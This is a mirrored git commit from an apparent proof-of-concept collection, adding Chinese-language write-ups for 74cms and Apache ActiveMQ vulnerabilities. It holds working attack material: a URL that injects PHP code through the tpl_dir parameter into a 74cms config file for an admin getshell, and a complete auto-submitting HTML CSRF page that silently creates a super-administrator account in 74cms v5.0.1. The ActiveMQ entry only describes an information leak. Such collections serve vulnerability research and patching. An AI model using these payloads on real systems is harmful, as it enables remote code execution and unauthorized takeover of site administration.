mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-05 10:50:23 +00:00
更新漏洞
This commit is contained in:
parent
56f46b9d98
commit
d74f37cc9a
46
CMS漏洞/74cms v4.2.1 v4.2.129 后台getshell漏洞.md
Normal file
46
CMS漏洞/74cms v4.2.1 v4.2.129 后台getshell漏洞.md
Normal file
@ -0,0 +1,46 @@
|
||||
# 74cms v4.2.1 v4.2.129 后台getshell漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
厂商:74cms
|
||||
下载地址:http://www.74cms.com/download/index.html
|
||||
关于版本:
|
||||
新版的74cms采用了tp3.2.3重构了,所以可知底层是tp,74cms新版升级是后台升级的,所以先将将升级方法。
|
||||
注:此漏洞不用升级至最新版本也可使用。
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
### 74cms升级到最新版
|
||||
|
||||
1, 先去官网下载 骑士人才系统基础版(安装包)
|
||||
2, 将下载好的包进行安装
|
||||
3, 进入后台点击查看如果不是最新版的话,请点击升级!
|
||||
4, 如果是本地环境的话,会提示 域名不合法升级失败,这个问题很好解决
|
||||
5, 搜索文件74cms\upload\Application\Admin\Controller\ApplyController.class.php
|
||||
6, 查找所有$_SERVER['HTTP_HOST'] 改为 http://baidu.com 即可
|
||||
|
||||
### 漏洞演示
|
||||
|
||||

|
||||
|
||||
url:
|
||||
|
||||
```
|
||||
http://74cms.test/index.php?m=Admin&c=Tpl&a=set&tpl_dir= ', 'a',phpinfo(),'
|
||||
```
|
||||
|
||||
shell:
|
||||
|
||||
```
|
||||
http://74cms.test/Application/Home/Conf/config.php
|
||||
```
|
||||
|
||||
路径:
|
||||
|
||||
```
|
||||
\74cms\upload\Application\Home\Conf\config.php
|
||||
```
|
||||
|
||||

|
||||
|
||||

|
||||
48
CMS漏洞/74cms v5.0.1 后台跨站请求伪造漏洞 CVE-2019-11374.md
Normal file
48
CMS漏洞/74cms v5.0.1 后台跨站请求伪造漏洞 CVE-2019-11374.md
Normal file
@ -0,0 +1,48 @@
|
||||
# 74cms v5.0.1 后台跨站请求伪造漏洞 CVE-2019-11374
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
在74CMS v5.0.1后台存在一个跨站请求伪造(CSRF)漏洞,该漏洞url:/index.php?m=admin&c=admin&a=add
|
||||
攻击者可以利用该漏洞诱骗管理员点击恶意页面,从而任意添加一个后台管理员账户,达到进入后台,获得一个后台管理员角色的控制权。
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
74CMS v5.0.1
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
首先我们登录后台页面,并添加管理员,然后添加信息,用burp_suite抓包
|
||||
|
||||

|
||||
|
||||
当管理员登录后台后,点击攻击者发来的连接即可创建一个新的超级管理员账户
|
||||
|
||||

|
||||
|
||||
利用exp如下:
|
||||
|
||||
```
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title> CSRF </title>
|
||||
<script type="text/javascript">
|
||||
function exec1(){
|
||||
document.getElementById('form1').submit();
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
<body onload="exec1();">
|
||||
<form id="form1" action="https://www.0dayhack.com/index.php?m=Admin&c=admin&a=add" method="POST">
|
||||
<input type="hidden" name="username" value="admin688" />
|
||||
<input type="hidden" name="email" value="111111111@qq.com" />
|
||||
<input type="hidden" name="password" value="admin688" />
|
||||
<input type="hidden" name="repassword" value="admin688" />
|
||||
<input type="hidden" name="role_id" value="1" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
```
|
||||
|
||||
BIN
CMS漏洞/images/20190529179538.png
Normal file
BIN
CMS漏洞/images/20190529179538.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 121 KiB |
BIN
CMS漏洞/images/20190529207783.png
Normal file
BIN
CMS漏洞/images/20190529207783.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 78 KiB |
BIN
CMS漏洞/images/image-20221207161107878.png
Normal file
BIN
CMS漏洞/images/image-20221207161107878.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 498 KiB |
BIN
CMS漏洞/images/image-20221207161145037.png
Normal file
BIN
CMS漏洞/images/image-20221207161145037.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 476 KiB |
BIN
CMS漏洞/images/image-20221207161151234.png
Normal file
BIN
CMS漏洞/images/image-20221207161151234.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 198 KiB |
18
Web服务器漏洞/Apache ActiveMQ 信息泄漏漏洞 CVE-2017-15709.md
Normal file
18
Web服务器漏洞/Apache ActiveMQ 信息泄漏漏洞 CVE-2017-15709.md
Normal file
@ -0,0 +1,18 @@
|
||||
# Apache ActiveMQ 信息泄漏漏洞 CVE-2017-15709
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
Apache ActiveMQ默认消息队列61616端口对外,61616端口使用了OpenWire协议,这个端口会暴露服务器相关信息,这些相关信息实际上是debug信息。
|
||||
|
||||
会返回应用名称,JVM,操作系统以及内核版本等信息。
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
apache-activemq-5.15.0 to apache-activemq-5.15.2
|
||||
apache-activemq-5.14.0 to apache-activemq-5.14.5
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||

|
||||
@ -1,4 +1,4 @@
|
||||
# ActiveMQ Deserialization Vulnerability (CVE-2015-5254)
|
||||
# Apache ActiveMQ 反序列化漏洞 (CVE-2015-5254)
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
|
||||
BIN
Web服务器漏洞/images/image-20221207162428650.png
Normal file
BIN
Web服务器漏洞/images/image-20221207162428650.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 133 KiB |
Loading…
x
Reference in New Issue
Block a user